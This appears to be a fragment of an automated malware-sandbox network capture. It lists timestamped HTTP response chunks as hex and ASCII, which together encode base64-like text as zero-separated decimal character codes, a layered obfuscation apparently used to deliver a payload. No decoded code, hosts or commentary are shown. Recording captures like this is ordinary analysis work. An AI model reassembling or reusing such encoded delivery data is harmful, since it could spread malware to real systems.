                    Data Ascii: 0 78 0 82 0 98 0 106 0 111 0 78 0 106 0 56 0 65 0 65 0 73 0 116 0 57 0 67 0 68 0 80 0 65 0 79 0 85 0 99 0 99 0 105 0 85 0 88 0 99 0 105 0 85 0 88 0 111 0 105 0 85 0 88 0 103 0 120 0 48 0 88 0 107 0 65 0 65 0 69 0 65 0 65 0 73 0 108 0 70 0 50 0 73 0 108 0
                    2021-10-26 16:59:18 UTC1054INData Raw: 36 20 30 20 35 37 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 34 37 20 30 20 38 39 20 30 20 35 33 20 30 20 39 39 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 34 33 20 30 20 37 30 20 30 20 35 32 20 30 20 31 31 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 34 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 34 33 20 30 20 31 30 35 20 30 20 31 30 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 32 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 31 32 32 20 30 20 37 32 20 30 20 37 32 20 30 20 31 32 32 20 30 20
                    Data Ascii: 6 0 57 0 43 0 105 0 87 0 80 0 103 0 65 0 65 0 77 0 47 0 89 0 53 0 99 0 120 0 120 0 43 0 70 0 52 0 118 0 79 0 105 0 56 0 80 0 111 0 84 0 106 0 56 0 65 0 65 0 70 0 67 0 76 0 120 0 43 0 105 0 107 0 80 0 103 0 65 0 65 0 82 0 106 0 116 0 122 0 72 0 72 0 122 0
                    2021-10-26 16:59:18 UTC1055INData Raw: 20 37 36 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 39 20 30 20 34 37 20 30 20 34 39 20 30 20 36 35 20 30 20 38 31 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 30 39 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 39 37 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 38 20 30 20 38 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 35 30 20 30 20 34 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 36 20 30 20 37 30 20 30 20 37 31 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 37 20 30 20 38 31 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20
                    Data Ascii: 76 0 66 0 111 0 118 0 79 0 47 0 49 0 65 0 81 0 54 0 121 0 109 0 76 0 66 0 109 0 97 0 68 0 112 0 98 0 84 0 47 0 47 0 118 0 56 0 65 0 106 0 89 0 50 0 48 0 47 0 47 0 55 0 47 0 85 0 89 0 49 0 78 0 116 0 70 0 71 0 76 0 122 0 118 0 57 0 81 0 69 0 73 0 50 0 70
                    2021-10-26 16:59:18 UTC1059INData Raw: 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 33 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 37 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20
                    Data Ascii: 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 73 0 84 0 65 0 65 0 65 0 85 0 87 0 105 0 89 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 77 0 84 0 65 0 65 0 65 0 85 0 87 0
                    2021-10-26 16:59:18 UTC1063INData Raw: 20 30 20 31 31 31 20 30 20 34 33 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 31 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 35 31 20 30 20 35 36 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 37 20 30 20 38 30 20 30 20 31 31 39 20 30 20 37 34 20 30 20 38 32 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 39 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 37 30 20 30 20 38 30 20 30 20 35 36 20 30 20
                    Data Ascii: 0 111 0 43 0 106 0 107 0 65 0 65 0 73 0 116 0 49 0 43 0 68 0 118 0 122 0 117 0 79 0 106 0 69 0 81 0 65 0 66 0 48 0 65 0 111 0 118 0 71 0 106 0 85 0 51 0 56 0 85 0 89 0 49 0 77 0 80 0 119 0 74 0 82 0 85 0 80 0 57 0 49 0 69 0 80 0 57 0 49 0 70 0 80 0 56 0
                    2021-10-26 16:59:18 UTC1064INData Raw: 20 38 36 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 32 32 20 30 20 35 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 38 36 20 30 20 31 31 30 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 36 20 30 20 34 33 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 39 38 20 30 20 35 35 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 36 20 30 20 39 38 20 30 20 31 32 32 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 34 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 86 0 108 0 99 0 122 0 57 0 118 0 56 0 86 0 110 0 77 0 66 0 65 0 65 0 71 0 106 0 43 0 65 0 81 0 65 0 65 0 105 0 47 0 105 0 78 0 104 0 98 0 55 0 57 0 47 0 47 0 57 0 87 0 85 0 71 0 97 0 74 0 116 0 98 0 122 0 57 0 47 0 47 0 47 0 111 0 118 0 74 0 85 0 65 0 65
                    2021-10-26 16:59:18 UTC1069INData Raw: 30 20 34 39 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 38 31 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 31 30 30 20 30 20 36 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 38 32 20 30 20 38 31 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 37 20 30 20 36 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 30 20 30 20 36 37 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 30 30 20 30 20 36 36 20 30 20 37 31 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37
                    Data Ascii: 0 49 0 43 0 80 0 47 0 81 0 54 0 119 0 73 0 122 0 119 0 68 0 118 0 68 0 100 0 69 0 105 0 76 0 82 0 81 0 121 0 74 0 82 0 81 0 106 0 111 0 47 0 65 0 107 0 65 0 65 0 73 0 116 0 50 0 67 0 68 0 118 0 122 0 100 0 66 0 71 0 78 0 82 0 102 0 120 0 81 0 97 0 103 0 7
                    2021-10-26 16:59:18 UTC1073INData Raw: 31 30 38 20 30 20 39 38 20 30 20 31 31 31 20 30 20 36 38 20 30 20 31 30 32 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 31 37 20 30 20 36 38 20 30 20 34 33 20 30 20 38 31 20 30 20 31 30 38 20 30 20 34 39 20 30 20 39 37 20 30 20 31 30 33 20 30 20 38 37 20 30 20 35 30 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 35 20 30 20 37 33 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 37 37 20 30 20 38 30 20 30 20 31 30 34 20 30 20 37 37 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 108 0 98 0 111 0 68 0 102 0 51 0 47 0 47 0 52 0 108 0 70 0 43 0 68 0 118 0 68 0 54 0 121 0 117 0 68 0 43 0 81 0 108 0 49 0 97 0 103 0 87 0 50 0 82 0 103 0 65 0 65 0 85 0 79 0 105 0 73 0 79 0 65 0 65 0 65 0 79 0 56 0 77 0 80 0 104 0 77 0 65 0 66 0 65 0 65
                    2021-10-26 16:59:18 UTC1077INData Raw: 30 20 35 30 20 30 20 37 30 20 30 20 35 36 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 35 36 20 30 20 38 30 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 35 20 30 20 34 39 20 30 20 31 30 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 38 36 20 30 20 31 31 34 20 30 20 31 30 33 20 30 20 36 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 39 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 34 37 20 30 20 38 30 20
                    Data Ascii: 0 50 0 70 0 56 0 118 0 122 0 47 0 47 0 49 0 78 0 81 0 90 0 111 0 109 0 100 0 56 0 80 0 122 0 47 0 47 0 43 0 105 0 49 0 106 0 103 0 65 0 65 0 105 0 51 0 85 0 77 0 103 0 56 0 81 0 77 0 86 0 114 0 103 0 69 0 65 0 81 0 65 0 65 0 106 0 98 0 51 0 119 0 47 0 80
                    2021-10-26 16:59:18 UTC1081INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 38 32 20 30 20 38 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 39 20 30 20 37 38 20 30 20 39 38 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 39 20 30 20 37 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 35 34 20 30 20 36 38 20 30 20 31 30 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 31 30 34 20 30 20 38 36 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 37 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 38
                    Data Ascii: 0 65 0 65 0 68 0 111 0 82 0 83 0 48 0 65 0 65 0 73 0 79 0 78 0 98 0 80 0 47 0 47 0 47 0 119 0 75 0 78 0 104 0 81 0 68 0 47 0 47 0 47 0 57 0 81 0 54 0 68 0 101 0 77 0 65 0 65 0 67 0 74 0 104 0 86 0 106 0 47 0 47 0 47 0 43 0 68 0 120 0 67 0 83 0 78 0 82 0 8
                    2021-10-26 16:59:18 UTC1085INData Raw: 20 30 20 34 39 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 35 20 30 20 39 30 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 31 30 32 20 30 20 31 30 30 20 30 20 36 35 20 30 20 37 38 20 30 20 38 38 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 30 20 30 20 38 34 20 30 20 39 37 20 30 20 36 37 20 30 20 31 32 32 20 30 20 37 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 31 30 34 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 36 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34
                    Data Ascii: 0 49 0 68 0 73 0 116 0 57 0 67 0 79 0 115 0 85 0 90 0 106 0 107 0 102 0 100 0 65 0 78 0 88 0 54 0 119 0 70 0 84 0 97 0 67 0 122 0 75 0 81 0 65 0 68 0 47 0 70 0 90 0 106 0 65 0 81 0 65 0 67 0 78 0 82 0 99 0 104 0 81 0 106 0 89 0 86 0 65 0 47 0 47 0 47 0 4
                    2021-10-26 16:59:18 UTC1089INData Raw: 30 20 34 37 20 30 20 35 31 20 30 20 39 39 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 38 20 30 20 31 31 31 20 30 20 37 30 20 30 20 36 37 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 37 30 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 35 31 20 30 20 34 38 20 30 20 37 37 20 30 20 39 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 31 20 30 20 38 30 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 33 20 30 20 39 38 20 30 20 38 38 20 30 20 34 39 20 30 20 35 31 20 30 20 36 37 20 30 20 36 37 20
                    Data Ascii: 0 47 0 51 0 99 0 81 0 97 0 103 0 68 0 111 0 70 0 67 0 69 0 65 0 65 0 73 0 80 0 69 0 70 0 79 0 115 0 81 0 105 0 51 0 48 0 77 0 97 0 79 0 106 0 69 0 81 0 65 0 67 0 68 0 121 0 80 0 47 0 111 0 100 0 121 0 115 0 65 0 65 0 70 0 53 0 98 0 88 0 49 0 51 0 67 0 67
                    2021-10-26 16:59:18 UTC1093INData Raw: 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 39 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 39 39 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 37 32 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 39 20 30 20 39 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 36 39 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 30 20 30 20 36 36 20 30 20 36 36 20 30 20 37 30 20 30 20 37 32 20 30 20 31 31 31 20 30 20 31 30 38 20 30 20 31
                    Data Ascii: 0 0 119 0 65 0 115 0 65 0 65 0 65 0 65 0 47 0 120 0 87 0 99 0 119 0 85 0 65 0 65 0 103 0 51 0 52 0 99 0 65 0 72 0 85 0 72 0 120 0 48 0 89 0 99 0 65 0 81 0 65 0 65 0 65 0 77 0 80 0 47 0 100 0 67 0 81 0 69 0 68 0 55 0 100 0 66 0 66 0 70 0 72 0 111 0 108 0 1
                    2021-10-26 16:59:18 UTC1096INData Raw: 37 33 20 30 20 37 33 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 39 30 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 38 20 30 20 37 30 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 34 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 38 32 20 30 20 31 31 33 20 30 20 36 36 20 30 20 36 37 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 38 39 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 30 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 33 20 30 20 31 31
                    Data Ascii: 73 0 73 0 85 0 52 0 118 0 90 0 68 0 54 0 57 0 78 0 70 0 65 0 43 0 118 0 88 0 82 0 119 0 68 0 87 0 104 0 67 0 76 0 101 0 103 0 82 0 113 0 66 0 67 0 118 0 101 0 85 0 52 0 118 0 89 0 68 0 54 0 57 0 70 0 69 0 65 0 43 0 118 0 88 0 82 0 103 0 68 0 87 0 103 0 11
                    2021-10-26 16:59:18 UTC1101INData Raw: 32 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 38 20 30 20 36 37 20 30 20 36 38 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 39 20 30 20 36 38 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 35 34 20 30 20 37 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 31 20 30 20 38 33 20 30 20 34 37 20 30 20 34 38 20 30 20 39 39 20 30 20 37 37 20 30 20 31 30 35 20 30 20 35 31 20 30 20 31 31 39 20 30 20 31 30 37 20 30 20 36 38 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30
                    Data Ascii: 2 0 119 0 69 0 68 0 67 0 68 0 65 0 66 0 88 0 105 0 47 0 109 0 68 0 102 0 119 0 81 0 65 0 100 0 82 0 47 0 47 0 100 0 67 0 81 0 73 0 54 0 70 0 118 0 47 0 47 0 47 0 43 0 70 0 119 0 72 0 81 0 83 0 47 0 48 0 99 0 77 0 105 0 51 0 119 0 107 0 68 0 70 0 67 0 76 0
                    2021-10-26 16:59:18 UTC1105INData Raw: 20 30 20 31 31 33 20 30 20 36 37 20 30 20 31 30 38 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 33 20 30 20 34 39 20 30 20 35 37 20 30 20 35 30 20 30 20 38 30 20 30 20 37 39 20 30 20 31 31 34 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 38 20 30 20 34 38 20 30 20 38 35 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 38 35 20 30 20 37 37 20 30 20 35 36 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 32 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 38 32 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35
                    Data Ascii: 0 113 0 67 0 108 0 107 0 122 0 119 0 73 0 49 0 57 0 50 0 80 0 79 0 114 0 105 0 48 0 85 0 81 0 105 0 48 0 48 0 85 0 105 0 85 0 88 0 85 0 77 0 56 0 67 0 74 0 82 0 100 0 105 0 74 0 82 0 100 0 121 0 74 0 82 0 102 0 83 0 78 0 82 0 100 0 82 0 81 0 47 0 51 0 85
                    2021-10-26 16:59:18 UTC1109INData Raw: 20 37 39 20 30 20 35 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 38 30 20 30 20 37 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 34 38 20 30 20 35 35 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 37 34 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 32 20 30 20 38 38 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 38 39 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20
                    Data Ascii: 79 0 55 0 47 0 47 0 43 0 103 0 80 0 77 0 103 0 65 0 65 0 106 0 89 0 85 0 48 0 55 0 118 0 47 0 47 0 54 0 74 0 106 0 122 0 47 0 47 0 57 0 102 0 88 0 108 0 118 0 74 0 119 0 103 0 81 0 65 0 86 0 89 0 118 0 115 0 103 0 101 0 119 0 89 0 67 0 65 0 65 0 65 0 85
                    2021-10-26 16:59:18 UTC1113INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 34 39 20 30 20 31 31 38 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 35 37 20 30 20 34 39 20 30 20 38 30 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 39 37 20 30 20 38 30 20 30 20 35 32 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 39 38 20 30 20 34 39 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20
                    Data Ascii: 0 65 0 65 0 73 0 50 0 70 0 49 0 118 0 51 0 47 0 47 0 49 0 100 0 81 0 90 0 111 0 109 0 57 0 49 0 80 0 51 0 47 0 47 0 43 0 103 0 77 0 101 0 103 0 65 0 65 0 103 0 56 0 81 0 77 0 97 0 80 0 52 0 72 0 65 0 65 0 67 0 78 0 104 0 100 0 98 0 49 0 47 0 47 0 57 0 88
                    2021-10-26 16:59:18 UTC1117INData Raw: 35 36 20 30 20 31 31 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 39 20 30 20 34 37 20 30 20 37 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 32 20 30 20 31 31 38 20 30 20 31 30 38 20 30 20 38 38 20 30 20 39 39 20 30 20 37 33 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 35 20 30 20 38 34 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 30 36 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 37 20 30 20 31 30 33 20 30 20 38 30 20 30 20 39 38 20 30 20 38 39 20 30 20 37 31 20 30 20 35 36
                    Data Ascii: 56 0 118 0 47 0 100 0 81 0 122 0 47 0 100 0 81 0 106 0 111 0 49 0 47 0 76 0 47 0 47 0 49 0 57 0 101 0 87 0 52 0 118 0 108 0 88 0 99 0 73 0 77 0 65 0 80 0 57 0 48 0 74 0 65 0 84 0 47 0 70 0 102 0 106 0 66 0 81 0 65 0 65 0 107 0 103 0 80 0 98 0 89 0 71 0 56
                    2021-10-26 16:59:18 UTC1121INData Raw: 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 38 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 37 39 20 30 20 31 31 31 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 35 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 36
                    Data Ascii: 69 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 122 0 88 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 79 0 111 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 117 0 51 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 80 0 69 0 68 0 6
                    2021-10-26 16:59:18 UTC1125INData Raw: 39 37 20 30 20 38 30 20 30 20 35 32 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 31 32 30 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 35 32 20 30 20 38 39 20 30 20 31 31 31 20 30 20 38 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 30 20 30 20 38 38 20 30 20 35 31 20 30 20 38 31 20 30 20 37 34 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 31 30 30 20 30 20 36 35 20 30 20 38 31 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 31 35 20 30 20 36 38 20 30 20 37 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20
